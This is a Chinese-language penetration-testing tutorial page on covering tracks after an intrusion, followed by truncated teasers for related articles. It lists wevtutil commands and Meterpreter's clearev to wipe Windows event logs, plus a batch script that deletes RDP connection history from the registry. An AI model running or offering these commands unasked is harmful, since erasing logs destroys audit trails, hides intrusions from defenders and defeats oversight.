滲透測試入門10之痕跡清理
windows日誌清除
獲取日誌分類列表:
wevtutil el >1.txt
獲取單個日誌類別的統計資訊: eg.
wevtutil gli "windows powershell"
回顯:creationtime: 2016-11-28t06:01:37.986z
lastaccesstime: 2016-11-28t06:01:37.986z
lastwritetime: 2017-08-08t08:01:20.979z
filesize: 1118208
attributes: 32
numberoflogrecords: 1228
oldestrecordnumber: 1
檢視指定日誌的具體內容:
wevtutil qe /f:text "windows powershell"
刪除單個日誌類別的所有資訊:
wevtutil cl "windows powershell"
破壞windows日誌記錄功能
利用工具
msf
run clearlogs
clearev
3389登陸記錄清除
@echo off
@reg delete "hkey_current_user\software\microsoft\terminal server client\default" /va /f
@del "%userprofile%\my documents\default.rdp" /a
@exit
滲透之 MSF Meterpreter清理日誌
在我們用msf成功對目標進行了滲透之後,不要忘記要清理滲透過程中留下的日誌,下面就如何清理日誌和大家分享下。步驟如下 c windows system32 net user 新增的使用者名稱 delc windows system32 exit 或者c windows system32 logoff...
windows滲透測試入門
windows服務的作用 服務決定了計算機的一些功能是否被啟用 不同的服務對應的功能不同 通過計算機提供的服務可以有效實現資源共享 常見的服務 web服務 dns服務 dhcp服務 郵件服務 telnet服務 ssh服務 smb服務 1 埠分為著名埠和動態埠兩種 知名埠即眾所周知的埠號,範圍從0到1...
滲透測試入門1之資訊收集
滲透測試入門1之資訊收集 建立企業密碼字典 1.開源情報資訊收集 osint 1.1 github 1.2 whois查詢 註冊人反查 郵箱反查 相關資產 1.3 google hacking 2.建立企業密碼字典 2.1 字典列表 pwd 123 user 123 user 521 user 20...